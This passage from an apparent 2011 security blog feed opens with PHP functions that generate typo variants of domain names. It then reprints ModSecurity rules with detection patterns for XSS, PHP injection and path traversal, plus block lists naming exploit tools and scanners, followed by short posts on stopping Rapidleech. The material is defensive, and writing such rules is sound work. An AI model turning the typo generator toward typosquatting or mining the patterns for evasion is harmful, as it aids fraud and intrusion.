$temp = "";
}
}

//Doubler lettres
function doubler_lettres($sld)
{

$array = preg_split('//',$sld);
$size = sizeof($array);
$size = $size - 1;

for ($i = 1; $i < $size; $i++)
{
if (!strcmp($array[ $i]," ")) { continue; }
for ($x = 1; $x < $size; $x++)
{
$temp = $temp . $array[ $x];
if ($x == $i) { $temp = $temp . $array[ $x] ; }
}
print "$temp ";
$temp = "";
}
}

//Erreur communes clavier azerty
function erreur_lettres_proches($sld)
{
$alphabet = Array(
a => array("z"),
z => array("a", "e"),
e => array("z", "r"),
r => array("e", "t"),
t => array("r", "y"),
y => array("t", "u"),
u => array("y", "i"),
i => array("u", "o"),
o => array("i", "p"),
p => array("o"),
q => array("s"),
s => array("q", "d"),
d => array("s", "f"),
f => array("d", "g"),
g => array("f", "h"),
h => array("g", "j"),
j => array("h", "k"),
k => array("j", "l"),
l => array("k", "m"),
m => array("l"),
w => array("x"),
x => array("w", "c"),
c => array("x", "v"),
v => array("c", "b"),
b => array("v", "n"),
n => array("b")
);

$sld = strtolower($sld);

$array = preg_split('//',$sld);
$size = sizeof($array);
$size = $size - 1;

for ($i = 1; $i < $size; $i++)
{
if (!strcmp($array[ $i]," ")) { continue; }
$current_letter = $array[$i];

if ( !$alphabet[$current_letter][0] ) { continue; }

$number_of_missed_keys = sizeof($alphabet[$current_letter]);

for ($x = 0; $x < $number_of_missed_keys; $x++)
{
for ($z = 1; $z < $size; $z++)
{
if ($i == $z) { $temp = $temp . $alphabet[$current_letter][$x] ; }
else { $temp = $temp . $array[ $z]; }
}
print "$temp ";
$temp = "";
}
}
}

////////////////////////Fin Fonctions/////////////////////////

Gotroot.com ModSecurity rules

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 17:51:00 +0000

User Agent Security Rules for modsec 2.x, Created by Michael Shinn of the Prometheus Group (http://www.prometheus-group.com). Download from: http://www.gotroot.com/downloads/ftp/mod_security/2.0/useragents.conf

#Comment spam header line
SecRule REQUEST_HEADERS "x-aaaaaa.*"
SecRule REQUEST_BODY "X-AAAAAA.*"

#check for bad meta characters in User-Agent field
#SecRule HTTP_User-Agent ".*\'"

#XSS in the UA field
SecRule HTTP_User-Agent "<(.|\s|\n)?(script|about|applet|activex|chrome|object)(.|\s|\n)?>.*<(.|\s|\n)?(script|about|applet|activex|chrome|object)"

#PHP code injection attack
SecRule HTTP_User-Agent "(<\?php|<[[:space:]]*\?[[:space:]]*php)" 
SecRule HTTP_User-Agent ".*HTTP_GET_VARS"

#recursion attack in UA field
SecRule HTTP_User-Agent "\.\./\.\."

#May cause false positives with some software, comment out if it does
#SecRule REMOTE_ADDR "!^127\.0\.0\.1$" "chain,id:390000,rev:1,severity:1,msg:'Suspicious Automated or Manual Request'"
#SecRule "HTTP_User-Agent|HTTP_HOST|HTTP_Accept" "^$"

#Exploit agent
SecRule HTTP_User-Agent "Mosiac 1\.*"

#Bad agent
SecRule HTTP_User-Agent "Brutus/AET"

#CGI vuln scan tool
SecRule HTTP_User-Agent cgichk
SecRule HTTP_User-Agent "DataCha0s/2\.0"

#Damn fine UA
SecRule HTTP_User-Agent ".*THIS IS AN EXPLOIT*"
SecRule HTTP_User-Agent "Morzilla"

#CIRT.DK Webroot auditing tool
SecRule HTTP_User-Agent ".*WebRoot "

#Exploit UA
SecRule HTTP_User-Agent ".*T H A T \' S  G O T T A  H U R T*"

#XML RPC exploit tool
SecRule HTTP_User-Agent "xmlrpc exploit*"

#A friendly little exploit banner for a WP vuln
SecRule HTTP_User-Agent "Wordpress Hash Grabber"

#Blocks scripts
SecRule HTTP_User-Agent lwp

#Web leaches
SecRule HTTP_User-Agent "Web Downloader"
SecRule HTTP_User-Agent WebZIP
SecRule HTTP_User-Agent WebCopier
SecRule HTTP_User-Agent Webster
SecRule HTTP_User-Agent WebZIP
SecRule HTTP_User-Agent WebStripper
SecRule HTTP_User-Agent "teleport pro"
SecRule HTTP_User-Agent combine
SecRule HTTP_User-Agent "Black Hole"
SecRule HTTP_User-Agent "SiteSnagger" 
SecRule HTTP_User-Agent "ProWebWalker" 
SecRule HTTP_User-Agent "CheeseBot" 

#Bogus Mozilla UA lines
SecRule HTTP_User-Agent "Mozilla/(4|5)\.0$"
SecRule HTTP_User-Agent "Mozilla/3\.Mozilla/2\.01$"

#Bogus IE UA line
SecRule HTTP_User-Agent "Microsoft Internet Explorer/5\.0$"

#Bogus UA
SecRule HTTP_User-Agent "FooBar/42"

#Nessus Vuln scanner UA
SecRule HTTP_User-Agent "Mozilla.*Nessus"

#Nikto vuln scanner UA
SecRule HTTP_User-Agent ".*Nikto"

#BAd/Bogus UAs
SecRule HTTP_User-Agent "Indy Library"
SecRule HTTP_User-Agent "Faxobot"
SecRule HTTP_User-Agent ".*SAFEXPLORER TL"

#Spam spinder UAs
SecRule HTTP_User-Agent ".*fantomBrowser"
SecRule HTTP_User-Agent ".*fantomCrew Browser"

#VB development library used by many spammers, might block legite VBscripts
#comment out if you have problems
SecRule HTTP_User-Agent "Crescent Internet ToolPak"

#Borland Delphi signature, as above, comment out if it gives you problems
#spammers sometimes use these UAs
SecRule HTTP_User-Agent "NEWT ActiveX\; Win32"
SecRule HTTP_User-Agent "Mozilla.*NEWT"

#Part of the Microsoft MSINET.OCX, as above, spammers sometimes use this, if
#it causes problems, comment out.  If you are a member of the Microsoft Site 
#Builder Network, you probably do NOT want to block this ID.
#SecRule HTTP_User-Agent "Microsoft URL Control"
#SecRule HTTP_User-Agent  "^Microsoft URL"

#e-mail collectors and spammers
SecRule HTTP_User-Agent "WebBandit"
SecRule HTTP_User-Agent "WEBMOLE"
SecRule HTTP_User-Agent "Telesoft*"
SecRule HTTP_User-Agent "WebEMailExtractor"
SecRule HTTP_User-Agent "CherryPicker*"
SecRule HTTP_User-Agent NICErsPRO
SecRule HTTP_User-Agent "Advanced Email Extractor*"
SecRule HTTP_User-Agent EmailSiphon
SecRule HTTP_User-Agent Extractorpro
SecRule HTTP_User-Agent webbandit
SecRule HTTP_User-Agent EmailCollector
SecRule HTTP_User-Agent "WebEMailExtrac*"
SecRule HTTP_User-Agent EmailWolf

#Spiders that eat up bandwidth for their customers
#Not a spammer, just a spider, comment out if you like
SecRule HTTP_User-Agent "CopyRightCheck"
SecRule HTTP_User-Agent "CopyGuard"
SecRule HTTP_User-Agent "Digimarc WebReader"

#MArketing spiders
SecRule HTTP_User-Agent  "Zeus .*Webster Pro*"

#Poker spam
SecRule HTTP_User-Agent  "8484 Boston Project"

#collectors
SecRule HTTP_User-Agent  "autoemailspider"
SecRule HTTP_User-Agent  "ecollector"
SecRule HTTP_User-Agent  "grub crawler"

#referrer spam, not the real weblogs
SecRule HTTP_User-Agent  "^www\.weblogs\.com"

#spam bots
SecRule HTTP_User-Agent  "DTS Agent"
SecRule HTTP_User-Agent  "POE-Component-Client"
SecRule HTTP_User-Agent  "WISEbot"
SecRule HTTP_User-Agent  "^Shockwave Flash"
SecRule HTTP_User-Agent  "Missigua"

#comment spam sign
SecRule HTTP_User-Agent  "compatible \; MSIE"

#Some regexps to catch silly bots
SecRule REQUEST_URI "!/ps(zones\|comp).txt1" chain
SecRule HTTP_User-Agent "^(google|i?explorer?\.exe|(MS)?IE( [0-9.]+)?[ ]?(Compatible( Browser)?)?)$"
SecRule HTTP_User-Agent "^(Mozilla( [0-9.]+)?[ ]?\((Windows|Linux|(IE )?Compatible)\))$"
SecRule HTTP_User-Agent "^Mozilla/5\.0 \(X11; U; Linux i686; en-US; rv\:0\.9\.6\+\) Gecko/2001112$"
SecRule HTTP_User-Agent "^Mozilla/[0-9.]+ \(compatible; MSIE [0-9.]+; Windows( NT)?( [0-9.]*)?;[0-9./ ]*\)?$"
SecRule HTTP_User-Agent "^Mozilla/.+[. ]+$"

#spammer
SecRule HTTP_User-Agent "Butch__2\.1\.1"
SecRule HTTP_User-Agent "agdm79@mail\.ru"

#Fake Gameboy UA
SecRule HTTP_User-Agent "GameBoy\, Powered by Nintendo"

#bogus amiga UA
SecRule HTTP_User-Agent "Amiga-AWeb/3\.4"

#exploit UA
SecRule HTTP_User-Agent "Internet Ninja x\.0"

#bogus googlebot UA
SecRule HTTP_User-Agent "Nokia-WAPToolkit.* googlebot.*googlebot"

#recently caught sending spam referrals, from their actual crawler IP
SecRule HTTP_User-Agent "BecomeBot"

#Suverybot
#SecRule HTTP_User-Agent "SurveyBot"

#exploit
SecRule HTTP_User-Agent "S\.T\.A\.L\.K\.E\.R\."
SecRule HTTP_User-Agent "NeuralBot/0\.2"
SecRule HTTP_User-Agent "Kenjin Spider"

#WebvulnScan
SecRule HTTP_User-Agent "WebVulnScan"

#broken spam tool
SecRule HTTP_User-Agent "Mozilla/4\.0 \(compatible\; MSIE 6\.0\; Windows NT 5\.1$"

#PHPBB worm UA
SecRule HTTP_User-Agent "INTERNET EXPLOITER SUX"

#fake UA
SecRule HTTP_User-Agent "Windows-Update-Agent"

#exploit
SecRule HTTP_User-Agent "Internet-exprorer"

# Bad Spider
SecRule HTTP_User-Agent "hl_ftien_spider"

# PMAFind 
SecRule HTTP_User-Agent "PMAFind"

Atomic Security Linux Unified Threat Manager?

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 17:49:00 +0000

[Put a image by Screen shoot of this (http://www.atomicrocketturtle.com/gallery2/main.php?g2_view=core.DownloadItem&g2_itemId=1650&g2_serialNumber=2)]

Atomic Secured Linux(tm) is an out-of-the-box Unified Security Suite for Linux(tm) systems designed to protect your servers against both known and unknown threats. It is distributed through a subscription yum channel ensuring that ASL is always kept up to date. Unlike other security solultions, ASL works by combining security at all layers, from the Kernel all the way up to the application layer to provide the most complete protection available for Linux servers and helps to ensure that your system is compliant with commercial and government security standards. ASL includes the most hardened and secure kernel on the market, built in vulnerability scanner, self-healing of vulnerabilities, automated system hardening, userspace and host Intrusion Prevention Systems (IPS), malware/rootkit detection and elimination, blacklisting technologies and web application firewalling to protect multiuser and web application hosting environments like no other solution. ASL is uniquely effective at addressing emerging threats posed by vulnerabilities in todays complex systems and applications, such as web hosting environments, multiuser systems, CRM's, ERPs, forums, shopping carts, Content Management systems and custom applications.

Bet for your Linux Security. http://www.atomicorp.com

See some Images: http://www.atomicrocketturtle.com/gallery2/main.php?g2_itemId=604

How Gotroot.COM Help me?

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 17:48:00 +0000

Gotroot.com is a site about Free Script and Free Security Apps - Those help u to protect ur host and ur php form Leech or hacking. They also has free Ebooks which is very important for you. ALso they has forums so u don't worry about it. discuss with them and rapidleech problem will be solve.

How do you stop Rapidleech on Hosting?

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 17:46:00 +0000

Here is 3 Ways to -

1. Blocking fsockopen should do the trick - that will at least keep it from running.

2. Mod_security has rules, isnt it? I know that c99 shells are blocked with it. If that's possible, so it's with rapidleech.

3. Filter all the php files. The ones that comply with the rule are deleted. Then, the ones that comply with part of the rule make the script send you an email with the path.

we must do somethings

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 12:12:00 +0000

we must do somethings about those rapidleech if any one has an idea put it in comments

hate rapidleech

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 11:53:00 +0000

first because they are bad for host like megaupload and fileserve example i need a premium account to download but when i find a public rapidleech i don't need yet to order a premium account.

seconde if i want to make money with host's files it doesn't work because all people will download with a single premium account so those rapidleech must stopped

What is Rapidleech?

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 10:00:00 +0000

Rapid Leech is a free server transfer script for use on various popular upload/download sites such as megaupload.com, Rapidshare.com and more than 45 others. The famous Rapidleech script transfers files from Rapidshare, Megaupload, Depositfiles.com, Easy-share.com, etc, via your fast servers connection speed and dumps the file on your server. You may then download these files from your server anytime later.